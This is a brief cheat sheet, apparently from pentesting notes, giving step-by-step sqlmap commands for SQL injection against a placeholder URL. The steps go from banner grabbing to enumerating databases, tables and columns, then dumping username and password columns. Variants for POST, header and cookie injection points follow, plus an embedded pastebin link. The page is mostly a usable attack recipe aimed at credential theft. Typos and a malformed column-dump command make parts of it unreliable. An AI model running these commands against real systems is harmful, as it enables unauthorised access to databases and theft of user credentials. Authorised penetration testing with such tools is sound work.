# sqlmap

For banner\
sqlmap -u example.com/tx.php?id=1 --batch --banner\
\
for database\
sqlmap -u example.com/tx.php?id=1 --batch --banner --dbs\
\
for tables\
sqlmap -u example.com/tx.php?id=1 --batch --banner -D DATABASE\_NAME --tables\
\
for colunms\
\
sqlmap -u example.com/tx.php?id=1 --batch --banner -D DATABASE\_NAME -T TABLE\_NAME --columns\
\
for colunms data\
\
sqlmap -u example.com/tx.php?id=1 --batch --banner -D DATABASE\_NAME -T TABLE\_NAME -C COLUNMS\_NAME\
\
\
for user and password\
\
sqlmap -u example.com/tx.php?id=1 --batch --banner -D DATABASE\_NAME -T TABLE\_NAME -C COLUNMS\_NAME , username,password --dump\
\
\
**POST base** // put \*(start) on input point\
\
python sqlmap.py -r request\_caputre.txt --batch --banner // sqlmap command same as\
\
\
**Header Base // put \*(start) on input point**\
\
python sqlmap.py -r request\_caputre.txt --batch --banner // sqlmap command same as\
\
**cookes base // put \*(start) on input point**\
\
python sqlmap.py -r request\_caputre.txt --batch --banner // sqlmap command same as<br>

{% embed url="<https://pastebin.com/rKpsMp0g>" %}
